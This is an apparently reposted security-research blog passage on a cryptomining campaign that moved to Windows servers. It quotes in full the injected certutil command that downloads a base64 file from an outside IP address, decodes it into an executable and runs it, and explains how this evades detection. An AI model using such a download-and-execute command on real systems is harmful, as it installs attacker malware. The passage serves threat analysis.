Old Dog, New Targets: Switching to Windows to Mine Electroneum
- by nlqip
Figure 2: Latest attack request targeting Windows servers
As shown in Figure 2, the latest attack requests are targeting the same URL, keeping the same HTTP header values and the same exploit structure, however, they are now using Windows shell commands to download and execute a file.
Using the Windows certutil Tool
While Linux ships with built-in command-line HTTP client tools like “curl” and “wget”, Windows doesn’t have parallel tools. The common alternative is to either write a Visual Basic or a PowerShell script or use the Windows BITSAdmin tool, which is typically used to download and upload jobs. We have already have witnessed attackers leveraging BITSAdmin in other campaigns. However, the current attackers chose to use a more creative technique, as the following injected commands show:
certutil -urlcache -split -f http://45.77.55.231/update.b64 update.b64 & certutil -decode update.b64 update.exe & update.exe
The attacker uses a command-line tool named “certutil” which, as described by Microsoft below, is part of the Windows operating system.
“Certutil.exe is a command-line program that is installed as part of Certificate Services. You can use Certutil.exe to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.”
However, a lesser known feature of the tool is fetching and caching certificate files from remote hosts using the “urlcache” flag. This is useful in attack scenarios and even provides a simple evasion capability using base64 encoding certificate format, as shown in Figure 3.
Source link
lol
Figure 2: Latest attack request targeting Windows servers As shown in Figure 2, the latest attack requests are targeting the same URL, keeping the same HTTP header values and the same exploit structure, however, they are now using Windows shell commands to download and execute a file. Using the Windows certutil Tool While Linux…
Recent Posts
- GitHub, Telegram Bots, and QR Codes Abused in New Wave of Phishing Attacks
- IoT Security In The C-3PO Age Will Be A Bit Different: Analysis
- Data Analytics, Cybersecurity ‘Hot Space’ For Deals For ‘Foreseeable Future’: Expert
- CISA: Hackers abuse F5 BIG-IP cookies to map internal servers
- CISA: Hackers abuse F5 BIG-IP cookies to map network devices